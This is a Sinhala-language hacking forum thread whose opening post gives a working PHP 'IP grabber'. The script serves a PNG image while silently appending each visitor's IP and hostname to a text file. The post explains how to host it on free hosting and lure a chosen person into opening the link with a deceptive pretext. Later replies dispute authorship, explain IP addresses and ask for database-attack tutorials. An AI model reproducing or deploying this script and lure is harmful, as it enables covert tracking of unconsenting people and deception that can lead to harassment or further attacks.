1. සමාවන්න. වෙබ් අඩවි‍යේ ඇති ලිපි බැලීමට හැකියාව ඇත්තේ සාමාජිකයන්ට පමණි. එබැවින් මෙතන ක්ලික් කර සාමාජිකත්වය ලබාගන්න. ගිණුමක් සාදන ආකාරය දැන ගැනීමට මෙතන ක්ලික් කරන්න.
  2. තම ෆේස්බුක් ගිණුම හරහා ෆෝරමයේ ලියාපදිංචිය සිදු කර ගත් අය හට ෆෝරමයට ලොග් විය නොහැකි බව ආරංචි විය. ඔබටත් එසේ සිදූ වී ඇත්නම් ඇත්නම් Forget password යන්න භාවිතා කර අලුත් password එකක් සාදාගෙන ලොග් වන්න. ගැටලුවක් පවතී නම් rulemax567@gmail.com වෙත email එකක් එවන්න.
    Dismiss Notice
Dismiss Notice
ආයුබෝවන් Guest ඔබ කැමතිද අපගේ Security Services එක සමග එකතු වී වැඩ කරන්න එසේනම් මෙතනින් එන්න

TUTORIAL කෙනෙක්ගේ IP එකක් ලේසියෙන් හොයාගමුද?

Discussion in 'Hacking Tutorials' started by #Shap_Manasick, Jan 27, 2017.

  1. #Shap_Manasick

    #Shap_Manasick සාමාජික
    Gold Member

    Messages:
    74
    Likes Received:
    92
    අද උදේ පොඩි ලෙඩක් ඔලුවට ගැහුවා එකෙක්ගේ IP එකක් හොයාගන්න ඕන වෙලා.
    ඉතින් දවස තිස්සෙම කෝඩ් ලිය ලිය ඉදල ඔන්න හොයාගත්තා පොඩි ක්‍රමයක්.
    මේක පොඩි script කෑල්ලක් හරි වැඩේට බහිමුකො දැන්

    * ඉස්සෙල්ලම ctrl + R ගහල notepad කියල ටයිප් කරලා enter ඔබන්න,
    * දැන් මම පහලින් දාන කෝඩ් එක කොපි කරන් එක නෝට්පෑඩ් එකේ සේව් කරගන්න.
    ----------------------------------------------------------------------------------------------------------
    <?php
    $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
    $img_number = imagecreate(400,95);

    $backcolor = imagecolorallocate($img_number,10,102,153);
    $textcolor = imagecolorallocate($img_number,255,255,255);

    imagefill($img_number,0,0,$backcolor);

    $number0 = ” This is Your IP/Proxy”;
    $number1 = ” IP: $_SERVER[HTTP_X_FORWARDED_FOR]“;
    $number2 = ” Host/Proxy: $hostname”;
    $number4 = ” _________________________________”;

    Imagestring($img_number,10,5,5,$number0,$textcolor);
    Imagestring($img_number,10,5,25,$number1,$textcolor);
    Imagestring($img_number,10,5,45,$number2,$textcolor);
    Imagestring($img_number,10,5,50,$number4,$textcolor);
    Imagestring($img_number,10,8,50,$number4,$textcolor);
    Imagestring($img_number,10,5,10,$number4,$textcolor);
    Imagestring($img_number,10,8,10,$number4,$textcolor);

    header(“Content-type: image/png”);

    imagepng($img_number);

    $file=fopen(“Name-here-to-protect-the-File.txt”,”a”);
    $file2 = “- IP joined – IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] – Host: $hostname – ‘\n’ “;

    fwrite($file, $file2);
    fclose($file);
    ?>

    --------------------------------------------------------------------------------------------------------------
    * හරි දැන් ඕක සේව් කරගන්න Shap.php වගේ නමකින් ඔය shap කියන එක වෙනස් කරත් අගට දෙන .php එකනම් වෙනස් කරන්න යන්න එපා ස්ත්තරනේ හොදද
    * දැන් වදෙන් බාගයක් ඉවරයි දැන් හොද free web hosting site එකක් හොයාගන්න, මමනම් පාවිච්චි කරේ https://www.000webhost.com/ ඔන්න ඕක.
    * දැන් එකේ file manager වලට ගිහින් ඔය ෆයිල් එක අප්ලෝඩ් කරලා ip එක දැනගන්න ඕන එකාට යවන්න,(මම යැව්වේ උබේ කෙල්ලගේ පොටෝ එකක් තියනව මේ බලහන් කියල)
    * ඉතින් එක click කරපු ගමන් IP එක අපේ hosting saver එකේ සේව් වෙලා ඇති ..

    පිටපත : හරිත් දිල්ෂාන්
    fb.com/shap.manasick
     
    #1
  2. Elite_x

    Elite_x Moderator
    Staff Member Gold Member

    Messages:
    97
    Likes Received:
    96
    meka uba liyapu script 1kda aththatama.....!

    meka mage laga 2013 idan thyanawa. chanuxbro marusira daapu tute 1kne meka.....
     
    #2
    mr.silent and Shadow like this.
  3. Elite_x

    Elite_x Moderator
    Staff Member Gold Member

    Messages:
    97
    Likes Received:
    96
    anyway keepit up bro, thanx for sharing..
     
    #3
    Shadow likes this.
  4. Thread Starter
    #Shap_Manasick

    #Shap_Manasick සාමාජික
    Gold Member

    Messages:
    74
    Likes Received:
    92
    මේක මාත් අහුලා ගත්ත එකක් මචෝ හැබෑයි chanuX Bro ගෙන් නම් නෙවෙයි. කාගේද කියල මතක නෑ කොහොමහරි එකෙන්නම් නෙවෙයි....
     
    #4
    Shadow likes this.
  5. Viper

    Viper Administrator
    Staff Member Gold Member

    Messages:
    97
    Likes Received:
    82
    පට්ට ..ඕක මම *#*#*#*#---Blocked---#*#*#*#* එකෙත් දැක්ක ඒ කාලේ
     
    #5
    Shadow likes this.
  6. ස්කෝපියන් ස්කෝපියන්

    Messages:
    36
    Likes Received:
    19
    Machan ip kiyanne mokakda kiyala pahadili karanna puliwanda loku udawwak
     
    #6
    Shadow and Alex like this.
  7. Alex

    Alex නැගී එන සාමාජික

    Messages:
    132
    Likes Received:
    119
    හැම pc එකකටම තියනව මචං අපිට තියන අයිඩින්ටිය වගේ අනන්‍යතාවක්.අපි අන්තර්ජාලයට යොමුවෙන්නෙ අපිට තියන ඒ අනන්‍යතාව හරහා.. ඒක තමා ip address එක.ඒකෙන් තමා අපිව අදුරගන්නෙ ඉන්ටර්නෙට් එකේදි
     
    #7
    Last edited: May 13, 2017
    Sachin d likes this.
  8. Crazy Madu

    Crazy Madu නවක සාමාජික

    Messages:
    23
    Likes Received:
    10
    elama
     
    #8
    Sachin d likes this.
  9. Shadow

    Shadow Administrator
    Staff Member Gold Member

    Messages:
    473
    Likes Received:
    350
    අන්තර්ජාලයට සම්බන්දව ඇති උපාංග අනන්‍යව හදුන ගන්න තමයි ඔය IP address system එක තියෙන්නේ.
     
    #9
  10. ස්කෝපියන් ස්කෝපියන්

    Messages:
    36
    Likes Received:
    19
  11. MonsteR_X

    MonsteR_X නවක සාමාජික

    Messages:
    10
    Likes Received:
    3
    ela bn..:D
     
    #11
  12. Modaya

    Modaya නවක සාමාජික

    Messages:
    2
    Likes Received:
    0
    Elama ayye website ekka database ekkta attack karana widiha daanako
     
    #12
  13. ashanmadu10895

    ashanmadu10895 සාමාජික

    Messages:
    50
    Likes Received:
    37
    #13
  14. Thilina Nimesh

    Thilina Nimesh සාමාජික

    Messages:
    58
    Likes Received:
    44

Share This Page